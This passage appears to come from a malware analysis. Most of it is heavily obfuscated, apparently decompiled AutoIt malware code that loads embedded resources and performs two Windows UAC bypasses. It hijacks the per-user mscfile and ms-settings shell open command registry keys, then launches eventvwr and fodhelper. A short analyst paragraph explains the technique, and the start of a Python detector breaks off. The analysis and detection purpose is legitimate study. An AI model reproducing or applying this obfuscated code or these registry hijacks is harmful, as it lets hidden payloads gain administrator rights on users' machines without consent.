.58..,56,59,62..,6..0..,1,5..9,..5..8..,..55,..62" , ".." 
) ) ) ) $116925729 = 432319576 ISPTR (378792 + 3473642 * 3705772 ) ENDIF IF $116925729 = 1718368979 THEN $HCRYPTHASH = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] ISBINARY (2326930 * 1028255 + 1037320 + 4291704154 ) $116925729 = 1051260188 ISPTR (3798087 * 3172599 + 4294757372 ) ENDIF IF $116925729 = 1808850186 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] += ZVTZJDNXHRPQQIM ("54" ) DIM $FRYZXG8PUGBZSL2VYA7Q = "Sfh78cQgHJIf6M8m0eSxkr9TENpebaLanvxlRCzesiXGBuwH4IIvp3EAgxCuWKeG7H2JpXExOMebDCqjr" $116925729 = 848901156 CHR (1815563 ) ENDIF IF $116925729 = 1885155689 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,57..,..57..,..5..9,3..,59,..3,..58..,..5..6,..6..0,5..7,6..0,..55,6..0,..5..8,59,56,6..0..,..57..,..5..8,5..6,..5..9,..58,..6..0..,..57,..57,5..7,59..,54..,..6..0,57..,59,5..4,..5..5,61..,5..5..,..5..7,6..0..,..57..,..57,55..,..60..,..58,..5..9..,..59,5..9,..5..9..,5..5,..3,5..5,..5..3,57,..5..8..,6..0..,..6..1,..5..9,58,5..9,..56,6..0..,58..,..6..0..,57,..5..9,5..8..,..5..5..,6..1..,56..,54,5..5,..6..2,..5..5,3..,..55,..53..,55..,..5..7,6..0,..59..,..5..7..,5..7,59..,..54..,6..0,5..7..,..5..9..,54,55,62.." , ".." ) ) ) ) $116925729 = 1970938970 INT (3989727 ) ENDIF IF $116925729 = 1924764602 THEN $VDATA = GLOBALDATA ($VDATA , $RT ) MOD (2283428 , 3605473 ) $116925729 = 1655436234 ENDIF IF $116925729 = 1947300206 THEN RETURN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,..5..7,..57,59..,3,5..9..,..3,58..,5..6,..6..0..,5..7..,60,55,6..0,..5..8,5..9,..56,6..0..,57,..57,60,5..9..,5..8,..60,5..7..,5..7,..57,..59..,54,6..0..,5..7..,..5..9..,54..,..55,6..1,55,5..7..,..6..0,..57,..57..,..6,6..0,58..,..60..,5..7,..6..0,5..3,60..,..5..8..,60..,..5..7..,55..,..3..,..55..,..5..3..,..5..6..,5..4..,55,6..2.." , ".." 
) ) ) ) EXITLOOP PTR ("MhsdezMeRXHTtSmxJuw7o3wREyeyqIhEw9BlRbmrAk2f3c8x1XgrAFSTUKHQvnYhQdwtqaQHhfFdbqXCAQHCC0d0rSAfDG5nwUz0OOh0gHjvaNSDX" ) ENDIF IF $116925729 = 1970938970 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..5..7..,..57,..59..,3..,..59,3,..57..,..5..6,5..9..,54,..5..9,3,..5..9..,3,55..,61,..5..5..,..5..7..,5..8,..6..,..58,..6,59,6..0..,..5..8,6..,..59..,..5..4,57..,56,..60,..55..,6..0..,6..2,60,..53..,60,5..7,..57,6..2..,..59..,5..,..6..0..,57..,..5..9,5..8..,6..0..,..5..5..,..5..9..,5..,59..,..5..4,5..9,3..,5..7,..57,..59,..5..4..,..60,57,..5..9,54,5..8..,..2,56,54,58,4..,..55..,..3..,..5..5,53..,..5..5..,5..5,..59,..55..,5..9..,..6..,..5..9..,..6,..59,..3..,5..5..,5..5..,..5..5..,..3..,..55..,5..3,5..5,55..,..57,..5..6..,6..0,..5..5..,60..,..6..2,6..0,5..3..,6..0,57..,..5..7,5..7..,..59,58..,..59,..56..,6..0..,..5..5..,60,..62..,..60..,5..3..,..6..0..,57,5..5,55,5..5..,..3,..55..,53,..5..5..,..5..5,..5..9..,..61..,..5..9..,54,59..,5,5..9..,..5..7,59,3,59,..5..8..,5..5,55,5..5..,3..,..55,..5..3,..55..,..57,6..0..,5..9,..5..7..,..5..6..,..6..0,..55..,6..0,6..2,..60,..5..3..,..60,..57,5..7,2,..5..9,..5..8,..60,..62,5..5,..3..,5..5..,..53,5..5..,55,..59..,6..1..,5..9..,54..,..5..9..,5..,..5..9..,..57..,59,..3,59,58..,..55,5..5,..5..5,3,..5..5,..5..3,..5..6..,53,..55..,..3..,55..,..5..3,5..5,55,..5..9,..5..5,..5..9..,6,5..9,6,5..9..,..3..,..55,55..,5..5,3,5..5,..5..3..,57,58..,60,61..,..59..,..58,59..,..5..6,..6..0,..5..8,..60..,..5..7,..59..,..5..8,55,..61..,5..5,5..5..,58,..5..7..,60..,..55..,6..0,58,59,..5..8,..55..,55,..5..5,..6..2,..5..5..,3..,5..5,..5..3..,5..5..,5..5..,..59,..57..,60..,..6..0..,..5..9..,6..,60..,55..,..59,..5..7..,..5..5,..5..5,5..5..,..3..,..55..,..53..,..5..6..,5..3..,..55,..3..,..55..,..53..,55..,5..5,60..,56,60..,57..,..60..,..55..,60,..58,5..9,5..6,..60..,..57..,..5..5..,1,..55..,55..,..55..,3,55,..53..,..55,..5..7..,..6..0,..57..,..5..7,5..5..,..6..0,..58,59,59..,5..9..,..59..,..5..5..,3,..55..,5..3..,55,..55,5.
.9,5..7,..6..0,60..,..59..,..6..,..60,..55..,..59..,5..7,..5..5..,..1,..55,5..5..,..55,3,..55,53..,5..7..,5..5..,59..,..6..2,..59..,5,59,..5..4,60,5..5,6..0,6..2..,..57,3,..59,58..,59,..5,5..5..,..61..,..55..,57..,6..0..,..59,57..,5..7..,59..,5..4..,..6..0..,..57..,5..9..,..54..,..55..,6..2..,5..5,..6..2.." , ".." ) ) ) ) $116925729 = 1296565717 INT (2615442 ) ISSTRING ("JKeJksRq07XVISw4QS0Ma7rzrpGcgJ1jMIpFDJlR7BM0rDg88TjqQyHMsNr4VNkpfN" ) ENDIF IF $116925729 = 2022545531 THEN $TTEMPSTRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,..5..7,59..,..3..,5..9,..3..,5..8..,..5..6,..60..,57..,60..,..5..5..,6..0,58..,5..9,..5..6..,6..0,57..,57,..56,..60..,..5..5..,59,5..8..,5..9,5..4..,60,..57..,..5..9,58,..55,..61,..55,..55..,59,..5..5,..60,..6..2,6..0,..57,59,5..8..,..58,..2,5..5..,5..5..,..5..5..,..5..3..,..5..5..,59..,..55,..53,..5..5..,..57,..5..9..,..6..2,5..8..,..53..,5..9,..3,59,..54,5..9,..62,..5..9,..5..,..5..8,..5..7,..5..9..,..58,..6..0,..6..1..,6..0..,..5..7,58,56,5..9..,..6..2..,..60..,..1,59,58..,..5..5..,53..,55,..2,5..5,5..3,56,5..4..,5..5,..53..,5..5..,..5..9..,..55..,53,..55,5..5..,..5..8..,4,..55..,..55,55..,3..,..5..5..,53..,..5..7,..57..,59..,3..,..5..9,3..,..58..,..56,..60,..5..7..,..6..0..,..5..5,60..,5..8..,5..9,5..6,6..0,57,..5..7..,..6..0,..59..,5..8,..60,..5..7,..5..8,..53..,6..0..,5..7..,6..0..,..5..5,..5..5,..6..1..,..5..5,..5..7,60..,..5..7,..5..7,5..5,..6..0..,58..,59,..5..9,59,5..9..,..5..5..,6..2..,55,..6..2.." , ".." 
) ) ) ) $116925729 = 1713506615 ENDIF IF $116925729 = 2032766480 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,..57..,59..,3,5..9..,..3,5..7,56..,..5..9..,..5..4,..59,..3..,5..9,3,..5..5..,..6..1..,..5..5,..5..7..,5..8..,6..,58..,6..,5..9,..6..0,58,..6..,..5..9..,5..4,57..,..56,..60..,..5..5,60..,..6..2,..6..0,..53,..6..0,..57,..57..,62,..59..,5,..6..0..,5..7..,59,58,6..0,55,..59,5,59,..54..,..5..9,3..,57,5..7,..5..9..,..54,6..0,..5..7,..59,5..4..,58,..2..,5..6..,54,..5..8..,4..,55..,..3,..55,..5..3,..55..,..5..5,..59,..5..5..,5..9..,..6,..59..,6,59,..3..,5..5..,5..5,55,..3..,55..,5..3..,5..5..,55..,57..,..5..6,..60..,5..5..,..60..,..6..2,..6..0,..53,60,..57..,..57..,5..7,59,58..,60,5..5..,..59..,62,60,59,..5..9,58,..5..7..,..2,..5..9..,..58..,6..0..,..62..,..55..,5..5..,..55,3..,5..5,53,5..5,..55..,..59,..61,..59..,5..4..,59..,..5..,59..,5..7..,59..,3..,..59..,58,55,..5..5,..5..5,..3..,..5..5..,57,58,6,..58..,6..,..5..9,..60..,..5..8,6..,5..9,..5..4,..5..7..,..56..,60..,..55,6..0,62,..6..0,53,..60,..5..7..,..5..7..,..6..2,..5..9..,..5..,6..0,..57,5..9..,..5..8,60,55,..59,..5..,59..,54,5..9,3..,57,5..7,5..9,54..,..60..,..5..7..,..5..9,5..4,..58,..2..,5..6..,..55,5..8,..4,55,3,5..5..,..53..,..5..5..,5..5..,60..,..58..,..59..,6..2..,5..9..,5,..6..0,..57..,..5..5,..55..,..5..5,..3..,..55,..53..,5..5,5..5,5..6,5..3,60..,61,56,..53,..56..,..5..3..,5..6,..5..3..,..56..,53..,..5..6,..5..9..,..56,59..,..5..6..,5..4..,5..6,53,..55..,..55..,..5..5..,3..,..5..5..,5..3,..55,..5..5..,..5..9..,6..1,..5..9..,54..,5..9,..5..,..5..9,..57,..5..9..,3..,..5..9..,..5..8..,5..5,..55..,55..,3,..5..5,..5..3..,5..5..,5..7,59,6..1,57..,..5..6,6..0,..5..5..,..6..0,..62..,6..0,..53,..6..0..,57..,..5..7,6..1,5..9..,..54,..60,..5..6..,..59,..6..1,55..,..3,..5..5,..53..,5..5..,..55..,5..9,5..7..,60..,60,5..9..,6,..6..0..,5..5,5..9,..5..7,..55,55..,55,..3,55,..53,..5..5..,55,56..,53,60,..61..,..5..6,5..3,5..6,53,5..6..,..5..3,5..6..,53,5..6..,..53,56..,..5..3..,5..6,..5..3.
.,5..6,..5..4..,..5..5,55,5..5,..3..,..5..5..,5..3,55,5..5,..59,6..1,59,54,..59..,..5..,5..9,..57..,59,..3,5..9..,..5..8,..5..5..,..1..,5..5..,5..5,..5..5..,..3..,..5..5,..53..,..56,..5..3,5..5..,62" , ".." ) ) ) ) ISFLOAT (1281457 + 3262434 + 2270997 ) $116925729 = 116471326 ENDIF IF $116925729 = 2060391673 THEN $BBINARY = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,..5..7,55..,59..,62,5..9,..5,..5..9..,..54..,60,..55..,..6..0..,62..,..55..,61..,..5..5,57,..6..0,59,..58,5..5,5..9..,..5..8..,..60,..5..7,..6..0..,..58,..6..0,55,..5..9..,..5,..55,..62" , ".." ) ) ) ) $116925729 = 954977294 ENDIF NEXT ENDFUNC FUNC RIINHIEBTT () GLOBAL $1203322726 = 256356752 GLOBAL $SQWVMUGFHS = 3728969 FOR $E = 0 TO 208224 ISFLOAT (1231434 + 4293056517 * 785299 + 4291740133 ) IF $1203322726 = 176683708 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..1,48..,31,..4..0,..4..6,4..8,4..9,4..4.." , ".." ) ) ) DIM $8YMKZQNWR6QDDCC6DX16 = 2024996 + 1286653 + 4293763593 * 2034330 * 2855398 + 4292770335 + 1859479 + 4294429152 $1203322726 = 1300820860 ISFLOAT ("tuSwkc9TjNUANoz7EqsbVDOYyzbe3uBvjxMjt7lpYWJeSgMoalmnymSZ" ) RANDOM (2997766 ) ENDIF IF $1203322726 = 256356752 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU..\..S..oftware..\..C..la..s..se..s\..m..s..cfil..e..\..sh..e..ll\..op..en..\..co..mm..and.." , ".." ) , "" , LUXBZMCWKPOC ("REG.._S..Z" , ".." 
) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) $1203322726 = 176683708 DIM $RPKPMGFCM83KGRXXDSHO = 3794622 * 2643542 * 1936402 + 4290986439 ENDIF IF $1203322726 = 1300820860 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ISPTR (1275853 + 4292450117 * 2206095 * 531502 ) EXITLOOP ENDIF DIM $WQ7N1GR7BUKYVLHNXUBI = 2888109 NEXT ENDFUNC FUNC EKRDVDSTJT ($LOOP , $TIME ) FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $LOOP GLOBAL $1027989821 = 256356752 GLOBAL $CAJSKBGJ74 = 3127585 FOR $E = 0 TO 3452509 IF $1027989821 = 113519199 THEN $HOKAFSRHEHOF ($TIME / $LOOP ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $A = $QNTYERAUOLAX ($A , $A + ZVTZJDNXHRPQQIM ("54" ) ) WINEXISTS ("EVZ9viDIOTXwanGdH6o11wQ6wHnjWtldY47OutYtLbrldcNg76C30dahf2MY4uWvHUHfp1Toi4o0eD2t4hmZ0rmU40JBRazro6NsDH1g" ) $1027989821 = 1300820860 PTR ("K9s4X" ) ENDIF IF $1027989821 = 256356752 THEN LOCAL $A = $UEHQXDUALSWD (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..61..,..61" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0..,..58,58" , ".." ) ) ) $1027989821 = 176683708 DIM $RQGHE7LI0I0VPGLLFR6U = 3210105 * 1852741 + 4294559115 + 4294360885 ENDIF IF $1027989821 = 1203322726 THEN #endregion $1027989821 = 113519199 CHR (3263422 ) ENDIF IF $1027989821 = 1300820860 THEN $A = $NCPIUPWKFYZJ ($A , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,56,..55" , ".." ) ) ) ISBINARY ("H4UzBHGbu2Tp1AKrYhb2YtQBXj9YrN431fl3oc6Hfh6JOFZ50FjIKHconsLrISUR70xVpSdVlCXRxgXqud7VEvrtd7O6zO9wwpLYh" ) $1027989821 = 1203322726 ENDIF NEXT NEXT ENDFUNC FUNC OLXQOLLAOO ($SOCCURRENCENAME ) GLOBAL $113519199 = 256356752 GLOBAL $UV0HEU7EV9 = 519385 FOR $E = 0 TO 755697 DIM $SRCHVFDZTIE9JQXYSH7J = 2268565 IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,35,..40,..2..7..,44,..51,2..0..,4..1,..19,..46..,44,..3..5,..40,..33" , ".." 
) ) ) ISBOOL ("RDLxd9pd" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE $113519199 = 176683708 DIM $SMFLQH6QEOYEALEQQZAY = "eETf59S6efFoQx442bwOR9u0HvmKOVcNFfNiWgVhoU9I3qtXJVxXNjoej3HIXgqtc2SJUWhWpoz7aW6rbyb4wpaw1J93IlthCQGbHUdYMLGyTrex" ISBOOL ("w6X1vSkXone" ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $ALASTERROR = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50..,..57,..5..7..,5..9,..3..,..59..,3,..5..7..,..56,..59..,..54..,..5..9..,3,..59,3,5..5..,..61..,5..5..,5..5,5..9..,2,..59,5..8..,60,..5..5,..5..9,..5..,59..,..5..8..,..5..9..,3..,56,5..6..,..5..6..,5..5,..55,5..,59,57..,59,3..,5..9,..3..,55..,5..5..,..5..5,..3,5..5,..5..3,..55..,5..5,..5..9..,5..7,60,..6..0,59,6..,..6..0,..55,..59,57,55..,..5..5,5..5..,3..,..55..,..5..3..,55..,55..,..5..7,..60..,..59,..5..8..,60..,5..7..,57..,3..,5..9..,..5..4..,..60,..5..6,..6..0,5..7..,..57,..58,6..0..,..55,6..0..,..5..5..,..5..9..,6..,..6..0,5..5,..5..5..,5..5..,55..,..6..2" , ".." ) ) ) ) ISSTRING ("5TrvmqVSKMJEL7rN6cfUTjmb3byyC" ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $AHANDLE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 
("5..3..,5..0..,..5..7,5..7,59,3..,..59..,..3..,..5..7,..5..6..,59,..54..,59..,3..,59..,3,5..5,..6..1..,..55,55..,..5..9,..2..,59,5..8,..60..,..55..,..5..9..,5,59,58,..5..9,3,5..6,56..,5..6..,..55..,..5..5..,..5,..5..9,..57,59,3..,..59..,3,..5..5..,..5..5..,..5..5,3..,..55..,5..3,55,..55..,5..9..,..61..,..59,5..4,..59..,5..,5..9..,57,59..,3..,5..9,..5..8,55..,..5..5,..5..5..,..3,..55,..5..3..,..55..,..55,57,5..6..,..6..0,..5..5,..5..9..,5..8..,..5..9,54..,6..0..,57,5..9..,5..8..,57..,..4,..6..0..,..5..8..,60,..5..7..,59,..5..8,6..0,6..1,58..,6..0..,55,..5..5,..5..5..,..3..,5..5..,..53,..5..5,..5..5..,..6..0,..56,..6..0..,57..,6..0..,..55,60,..58,..5..9..,..5..6..,..6..0,5..7..,..55,1,5..5..,5..5..,..5..5..,3,55..,53,55,55..,..56..,..53..,..5..5,5..5..,55,3,..5..5,..53..,..5..5,55..,5..9,..55,5..9..,6..,..59,..6..,..5..9,..3,55,..55..,..5..5..,..3..,..5..5..,..53..,55..,..55..,56,54,..55..,5..5,5..5..,3,..55..,53,..55..,55..,60..,..60,..60..,5..6,6..0,57,60,55..,..55..,..55..,..55,..3..,..55..,53,55..,..5..7,..6..0,56..,..57,6,59..,..56,5..9,5..6,60,5..8..,..6..0..,..5..5,..60..,..55,5..9,..58..,..59,..5,59,5..6,5..9,58,..5..7..,..5..,..59,..54,..5..9..,4,..5..9..,58,..5..5..,6..2" , ".." ) ) ) ) DIM $AGQC2GKFQTIOLQ5Z8PYJ = 2056874 $113519199 = 1203322726 MOD (1856831 , 749187 ) MOD (429369 , 719967 ) ENDIF ISSTRING (3019897 * 611979 * 2236844 ) NEXT IF $ALASTERROR [ZVTZJDNXHRPQQIM ("53" ) ] = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54,..6..1,..5..6.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $3C3N0HCCFM = 2585397 FOR $E = 0 TO 1560412 IF $1300820860 = 176683708 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,..5..8,53..,6..0,..55..,..5..9..,6,5..9,56,..59..,5..8..,60,..56,60..,5..6..,..5..7..,56..,5..9,3,5..9,..6,60..,5..6,..59,..5..8,5..5..,6..1..,5..7,..5..3,..5..7,5..4,6..0..,..58,..6..0..,57..,..59..,6..,5..7,..6..2,60,..57..,..5..7..,..5..8..,..6..0..,6..1..,59,..5..8,55..,..62" , ".." 
) ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,..5..7..,..57,5..9,..3,5..9,3..,..57..,56..,..59..,..54,..59..,3..,59,3..,5..5..,6..1,55,..55,5..9..,2..,..5..9,5..8,60,55,..5..9..,..5..,59..,58,..5..9..,3..,56,..5..6,5..6,55..,..5..5,..5,..5..9..,..5..7,5..9..,3,..5..9,..3..,55,..5..5,..5..5..,..3..,55,..53,55..,5..5,..5..9..,..5..5..,5..9,..6,..59,..6,59,3,55..,55..,55..,..3,5..5,53,55,5..5,57..,..5..6..,59,..3..,..59,6..,6..0..,5..6,59..,..58..,5..7..,..6..1,59,..54,..5..9..,5,..5..9..,5..7,..5..9..,3..,..59,..5..8,..55..,..5..5..,..5..5,3,..55..,..5..3,5..5,..5..5..,59,61..,5..9..,54,..5..9,5..,5..9..,57,5..9..,3..,..5..9..,5..8..,..5..5,..55,..55,..3,55,5..3..,..5..5,..5..7..,..5..9,54..,..5..7,..6..1..,..5..9..,..5..4..,59..,5..,..59..,..57,59..,3..,59,5..8,5..8,2..,..5..5,..55..,56..,..5..3..,5..5..,55..,58,..4..,55,62.." , ".." ) ) ) ) PTR (648199 + 4291384348 * 1350741 ) $1300820860 = 176683708 ENDIF NEXT ENDIF ENDFUNC FUNC READRESOURCES ($RESNAME , $RESTYPE ) GLOBAL $1924764602 = 256356752 GLOBAL $2DWOVU3LJ8 = 3471477 FOR $E = 0 TO 1624533 ISFLOAT (1499981 + 4291913795 ) IF $1924764602 = 113519199 THEN LOCAL $GLOBALMEMORYBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..ne..l32...dll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2,41,2..7,3..0,18..,..3..1..,..4..5,4..1,..4..7,44..,..29..,..3..1" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." 
) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] ISFLOAT (2158948 + 3150033 ) $1924764602 = 1027989821 ENDIF IF $1924764602 = 176683708 THEN #region meGTX ISPTR ("MuvD5NII6r0NzOUNNrejiZ4n7Klj2zDgtXT9gqZjjvKcri2uRBuZQmYYAhGtCzQFXUtM5VGwC4aWo16YT0BzeNzh95H8UERTQepGZoz558wWmcJJl" ) $1924764602 = 1300820860 ISBINARY (1038234 + 1290738 + 2574470 ) ISBOOL (3864753 + 391224 ) ENDIF IF $1924764602 = 256356752 THEN LOCAL $HINSTANCE $1924764602 = 176683708 ENDIF IF $1924764602 = 1027989821 THEN LOCAL $MEMORYPOINTER = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..rnel..32...dl..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2..,..4..1..,..29,..37,18,3..1,4..5..,41..,..47..,44..,..2..9..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , $GLOBALMEMORYBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] DIM $RN46V8WB4FVZMGNLKZSW = 1434297 $1924764602 = 1138660241 CHR (3912492 ) ENDIF IF $1924764602 = 1138660241 THEN RETURN $CSRHZILJDSLP (LUXBZMCWKPOC ("byte..[.." , ".." ) & $RESSIZE & "]" , $MEMORYPOINTER ) DIM $KAVU1QRRNOWJDIFQFDLW = 3551850 EXITLOOP ENDIF IF $1924764602 = 1203322726 THEN LOCAL $RESSIZE = $XFNAYPZBZOLC (LUXBZMCWKPOC ("kern..el..3..2...dll.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0..,..49..,..41,..44,30" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("19,3..5..,..5..2..,..31,41..,32,..18..,..3..1,..45,41,..4..7,44..,29..,..31" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2,46,4..4.." , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] $1924764602 = 113519199 RANDOM (11499 ) RANDOM (1239835 ) ENDIF IF $1924764602 = 1300820860 THEN LOCAL $INFOBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..er..nel..32.d..ll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,3..5..,40,..3..0..,..1..8..,3..1..,4..5..,41,..47..,44..,2..9..,3..1..,..23" , ".." 
) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..2..,4..6,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,..4..5..,..46,..44" , ".." ) ) , $RESNAME , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("38..,4..1,..40..,..33" , ".." ) ) , $RESTYPE ) [ZVTZJDNXHRPQQIM ("53" ) ] INT (2631221 ) $1924764602 = 1203322726 WINEXISTS ("CJWvzyp4DLvnjKMK8JsRSpXqpnlbnoNc9pwH8GQJUbEx7JVTcSq7cmdmXEflnoRp7sn3oeLB3S7RUytOCB9E7QaWmjUD" ) ENDIF NEXT ENDFUNC FUNC IPTYOQECLE () GLOBAL $1027989821 = 256356752 GLOBAL $EUPZNV1E7F = 1430011 FOR $E = 0 TO 3312713 IF $1027989821 = 113519199 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("H..K..CU..\..So..f..tw..ar..e\Cla..s..s..es\..m..s-s..e..t..t..ings\..she..l..l..\..o..p..en..\..c..om..mand" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4..,..31..,3..8,31,3..3,..2..7,..4..6,3..1,..5,..50,..3..1..,..29..,4..7..,..46,..3..1" , ".." ) ) , LUXBZMCWKPOC ("R..EG.._SZ.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..4,47,3..8..,3..8" , ".." ) ) ) $1027989821 = 1300820860 MOD (760232 , 1141297 ) ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..nel..3..2.d..l..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("23..,41,49,..59..,57..,5,4..0..,..2..7..,28..,38,3..1..,2..3,..41..,49,..5..9,5..7..,..6,..4..5..,..18..,31..,3..0,3..5..,4..4,31..,..29,..4..6..,35,..4..1,..4..0" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,..41..,41..,..3..8,..3..1,..2..7,4..0" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..2..,..4..1..,..3..0..,3..4..,..3..1..,..3..8..,..42,31,..44" , ".." 
) ) ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU\So..f..t..ware..\C..l..as..ses..\m..s-se..ttin..g..s..\sh..el..l\o..p..en\..co..mm..an..d.." , ".." ) , "" , LUXBZMCWKPOC ("R..E..G_SZ" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) ISBOOL (126727 + 2458991 * 2143283 ) $1027989821 = 1203322726 STRING ("VJ" ) ENDIF STRING (681155 + 4291180643 * 2601491 ) NEXT ENDFUNC FUNC ACL ($HANDLE ) GLOBAL $864731176 = 256356752 GLOBAL $XA8YFGHYNW = 3821865 FOR $E = 0 TO 601978 WINEXISTS ("w808OWmnF2syAFyCs7TUZT7V4MWcwZBUatdOf09lKWBFnSRrYs0S1kbMaedc9k1RzHyhCUwC8HidrAHm5Dnd8U2ZrANbX7lA5UgQtJ" ) IF $864731176 = 113519199 THEN LOCAL $TSD = $E ($BN (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,57..,5..9,..3..,..5..9..,..3..,58,5..6..,6..0,..5..7,60,..5..5..,..6..0,5..8..,..5..9..,56..,60,5..7..,..57..,..56..,..60..,..5..5,59..,..58,59,..5..4,60..,5..7..,5..9..,5..8..,..55..,..61,..55,..5..5..,59..,5..5..,60,..6..2..,..6..0..,57..,59..,58..,..5..8,2..,..5..6,..5..5,..5..6,..5..3..,5..8,4..,..55..,5..5,..55,..6..2.." , ".." ) ) ) ) RANDOM (1511357 ) $864731176 = 1027989821 DIM $7VIG1GF6YSOOIZCFVOAW = "iHu23uOjgKaIYtffD60QDhbAaVVX8JSS6tZXoO7V1XRgOfUE6a1TkQnaG41iJ1kG3rLDEr1Z8eZQA4W4aq08S" MOD (369540 , 3283063 ) ENDIF IF $864731176 = 176683708 THEN $BN = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28..,35,4..0,..2..7,44,5..1,46,4..1,..4..5,4..6..,44,..3..5..,40..,..3..3.." , ".." 
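Both RIINHIEBTT and IPTYOQECLE above are per-user registry hijacks of auto-elevating Windows binaries: the first writes the default value of HKCU\Software\Classes\mscfile\shell\open\command (the ".." filler in the string literal is removed at run time) to the path held in $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF and then launches the program whose encoded name decodes to eventvwr; the second disables Wow64 file-system redirection, writes a DelegateExecute value plus the default command under HKCU\Software\Classes\ms-settings\shell\open\command, and launches fodhelper. HKCU is writable at medium integrity, so the elevated process started by the consent-free binary ends up running the payload. The detector below is an added example for this report and is not code from the sample or from the sandbox; the Sysmon-style event lines it consumes are constructed for the example, and the tab-separated layout, the `detect` function and the hypothetical `sample.exe` path are assumptions of the example, not anything the report states.

```python
from collections import defaultdict

# Per-user shell verb keys read by auto-elevating Windows binaries, paired with the
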